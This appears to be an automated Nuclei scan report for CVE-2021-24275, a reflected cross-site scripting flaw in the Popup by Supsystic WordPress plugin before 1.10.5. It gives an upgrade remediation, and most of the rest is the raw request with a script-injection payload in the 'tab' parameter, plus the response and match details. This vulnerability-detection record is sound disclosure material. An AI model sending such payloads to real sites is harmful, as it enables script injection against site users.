WordPress Popup by Supsystic before 1.10.5 did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected cross-site scripting issue.
Remediation
Upgrade to Popup by Supsystic version 1.10.5 or later to mitigate the vulnerability.
GET /wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ar; rv:1.9.2) Gecko/20100115 Firefox/3.6
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 307
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:42:03 GMT
GET /wp-admin/admin.php?page=popup-wp-supsystic&tab=</script><script>alert(document.domain)</script> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ar; rv:1.9.2) Gecko/20100115 Firefox/3.6
Details: CVE-2021-24275 matched at honey.scanme.sh
Protocol: HTTP
Full URL: https://honey.scanme.sh/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
Timestamp: Tue Apr 30 13:42:03 +0000 UTC 2024
Source: https://cloud.projectdiscovery.io/vuln/6496c77d697a8425e78f74500412bd92
Template Information
Request
Response
References:
CURL command
Generated by Nuclei v3.2.5